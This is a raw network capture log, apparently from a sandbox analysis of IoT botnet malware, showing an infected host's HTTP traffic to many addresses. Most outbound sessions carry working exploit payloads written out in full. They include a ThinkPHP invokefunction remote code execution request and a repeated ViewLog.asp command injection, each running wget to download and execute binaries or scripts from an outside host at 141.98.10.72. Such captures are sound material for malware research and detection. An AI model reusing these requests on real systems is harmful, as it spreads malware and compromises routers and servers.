                                                            Feb 14, 2024 09:29:41.182338953 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:41 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:41 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 64 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 33 38 31 26 23 34 36 3b 33 39 62 66 37 64 65 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8d341060&#46;1707899381&#46;39bf7de2</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            756192.168.2.2343516113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.990412951 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:24Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            757192.168.2.235471688.103.182.13780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:40.994704962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:41.214941978 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: ZTE web server 1.0 ZTE corp 2015.
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            X-Content-Type-Options: nosniff
                                                            Cache-Control: no-cache,no-store
                                                            Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20
                                                            Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its
                                                            Feb 14, 2024 09:29:41.214957952 CET156INData Raw: 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61
                                                            Data Ascii: own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            758192.168.2.234547231.136.170.2098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.012345076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:41.621113062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.869050980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:45.396752119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:50.515938044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.498763084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:21.487627983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:02.441937923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            759192.168.2.235071231.136.196.608080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.015264988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:41.653229952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.901067019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:45.396729946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:50.515913010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.498682022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:21.487646103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:02.441940069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            760192.168.2.2354994107.163.45.15623
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.017910957 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:43Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            761192.168.2.235618895.9.91.680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.037744999 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            762192.168.2.233498662.29.70.458080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.058429003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            763192.168.2.235915494.122.125.218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.058630943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            764192.168.2.235526494.122.49.1068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.060235023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            765192.168.2.235483295.86.110.1208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.064028025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            766192.168.2.235474288.103.182.13780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:41.430836916 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: ZTE web server 1.0 ZTE corp 2015.
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Type: text/html; charset=iso-8859-1
